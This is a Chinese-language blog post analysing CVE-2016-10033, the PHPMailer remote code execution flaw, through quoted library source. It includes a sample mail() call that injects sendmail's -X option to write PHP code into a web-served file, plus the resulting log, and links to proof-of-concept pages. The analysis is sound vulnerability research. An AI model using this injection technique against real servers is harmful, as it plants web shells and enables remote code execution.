PHPMailer < 5.2.18 Remote Code Execution(CVE-2016-10033)
langu_xyz
 2017-01-05 21:00:00      2.2k Words  12 Mins

关键代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

protected function mailSend($header, $body)
{
  $toArr = array();
  foreach ($this->to as $toaddr) {
      $toArr[] = $this->addrFormat($toaddr);
  }
  $to = implode(', ', $toArr);

  $params = null;
  //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver
  if (!empty($this->Sender)) {
      $params = sprintf('-f%s', $this->Sender);
  }
  if ($this->Sender != '' and !ini_get('safe_mode')) {
      $old_from = ini_get('sendmail_from');
      ini_set('sendmail_from', $this->Sender);
  }
  $result = false;
  if ($this->SingleTo and count($toArr) > 1) {
      foreach ($toArr as $toAddr) {
          $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
          $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
      }
  } else {
      $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
      $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
  }
  if (isset($old_from)) {
      ini_set('sendmail_from', $old_from);
  }
  if (!$result) {
      throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
  }
  return true;
}

已知问题代码出现在mail()函数,首先定位到$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);这行代码。
通过mailPassthru跟踪到下面这段代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
private function mailPassthru($to, $subject, $body, $header, $params)
    {
        //Check overloading of mail function to avoid double-encoding
        if (ini_get('mbstring.func_overload') & 1) {
            $subject = $this->secureHeader($subject);
        } else {
            $subject = $this->encodeHeader($this->secureHeader($subject));
        }

        //Can't use additional_parameters in safe_mode
        //@link http://php.net/manual/en/function.mail.php
        if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }
        return $result;
    }

根据这段if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) { $result = @mail($to, $subject, $body, $header);可以看到只有safe_mode没有开启的情况下才存在漏洞。

假设这个函数没有开启,继续追踪到关键函数$result = @mail($to, $subject, $body, $header, $params);
接下来看一看这个函数到底是怎么绕过的,追踪$params参数
setFrom()函数中发现这个参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        // Don't validate now addresses with IDN. Will be done in send().
        if (($pos = strrpos($address, '@')) === false or
            (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and
            !$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . " (setFrom) $address";
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new phpmailerException($error_message);
            }
            return false;
        }
        $this->From = $address;
        $this->FromName = $name;
        if ($auto) {
            if (empty($this->Sender)) {
                $this->Sender = $address;
            }
        }
        return true;
    }

函数中对address参数进行了过滤,既然这样,那问题肯定就是出现在过滤函数中了,继续往下找

过滤函数validateAddress

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
public static function validateAddress($address, $patternselect = null)
    {
        if (is_null($patternselect)) {
            $patternselect = self::$validator;
        }
        if (is_callable($patternselect)) {
            return call_user_func($patternselect, $address);
        }
        //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321
        if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {
            return false;
        }
        if (!$patternselect or $patternselect == 'auto') {
            //Check this constant first so it works when extension_loaded() is disabled by safe mode
            //Constant was added in PHP 5.2.4
            if (defined('PCRE_VERSION')) {
                //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2
                if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
                    $patternselect = 'pcre8';
                } else {
                    $patternselect = 'pcre';
                }
            } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
                //Fall back to older PCRE
                $patternselect = 'pcre';
            } else {
                //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
                if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
                    $patternselect = 'php';
                } else {
                    $patternselect = 'noregex';
                }
            }
        }
        switch ($patternselect) {
            case 'pcre8':
                /**
                 * Uses the same RFC5322 regex on which FILTER_VALIDATE_EMAIL is based, but allows dotless domains.
                 * @link http://squiloople.com/2009/12/20/email-address-validation/
                 * @copyright 2009-2010 Michael Rushton
                 * Feel free to use and redistribute this code. But please keep this copyright notice.
                 */
                return (boolean)preg_match(
                    '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
                    '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
                    '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'pcre':
                //An older regex that doesn't need a recent PCRE
                return (boolean)preg_match(
                    '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
                    '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
                    '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
                    '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
                    '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
                    '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
                    '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
                    '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
                    '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
                    $address
                );
            case 'html5':
                /**
                 * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.
                 * @link http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)
                 */
                return (boolean)preg_match(
                    '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);
            case 'php':
            default:
                return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }

看到这段可以分析出两个限制条件,php版本小于5.2.0并且不支持PCRE才有可能调用 $patternselect = 'noregex';,
假设版本小于5.2.0并且不支持PCRE,看一看noregex如何过滤的

1
2
3
4
5
6
7
case 'noregex':
    //No PCRE! Do something _very_ approximate!
    //Check the address is 3 chars or longer and contains an @ that's not the first or last char
    return (strlen($address) >= 3
        and strpos($address, '@') >= 1
        and strpos($address, '@') != strlen($address) - 1);

只要存在@并且长度大于等于3就好了,那这样就可以任意构造这个参数了。
接下来继续分析怎么构造会造成漏洞

这个漏洞的核心是因为php mail()函数漏洞引起的

首先看一下这个函数http://www.w3school.com.cn/php/func_mail_mail.asp的语法

1
2
3
4
5
6
7
8
语法
  mail(to,subject,message,headers,parameters)
参数	描述
  to	必需。规定邮件的接收者。
  subject	必需。规定邮件的主题。该参数不能包含任何换行字符。
  message	必需。规定要发送的消息。
  headers	必需。规定额外的报头,比如 From, Cc 以及 Bcc。
  parameters	必需。规定 sendmail 程序的额外参数。

声明:下面这段摘自绿盟博客,解释的至少比我易懂

在Linux系统上,mail函数在底层实现中,默认调用Linux的sendmail程序发送邮件。在sendmail程序的参数中,有一个-X选项,用于记录所有的邮件进出流量至log文件中。

1
2
3
4
> -X logfile
 > Log all traffic in and out of mailers in the indicated log
 > file. This should only be used as a last resort for debugging
 > mailer bugs. It will log a lot of data very quickly.

通过-X指定log文件记录邮件流量,实际可以达到写文件的效果。
例如,如下php代码

1
2
3
4
5
6
7
$to = '[email protected]';
$subject = 'Hello Alice!';
$message=‘<?php phhpinfo(); ?>’;
 $headers = "CC: [email protected]";
$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
mail($to, $subject, $message, $headers, $options);
 ?>

执行后,查看log文件/var/www/html/rce.php

1
2
3
4
5
6
7
17220 <<< To: [email protected]
 17220 <<< Subject: Hello Alice!
 17220 <<< X-PHP-Originating-Script: 0:test.php
 17220 <<< CC: [email protected]
 17220 <<<
 17220 <<< <?php phpinfo(); ?>
 17220 <<< [EOF]

发现被写入了包含在邮件标题或正文中的php代码,通过访问此log文件可以执行预先可控的php代码。
image

关于POC可以看一下这些文章

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
http://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
http://blog.nsfocus.net/multiple-php-mail-function-vulnerability-analysis/?utm_source=tuicool&utm_medium=referral
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033

  • Post title:PHPMailer < 5.2.18 Remote Code Execution(CVE-2016-10033)
  • Post author:langu_xyz
  • Create time:2017-01-05 21:00:00
  • Post link:https://blog.langu.xyz/PHPMailer < 5.2.18 Remote Code Execution(CVE-2016-10033)/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.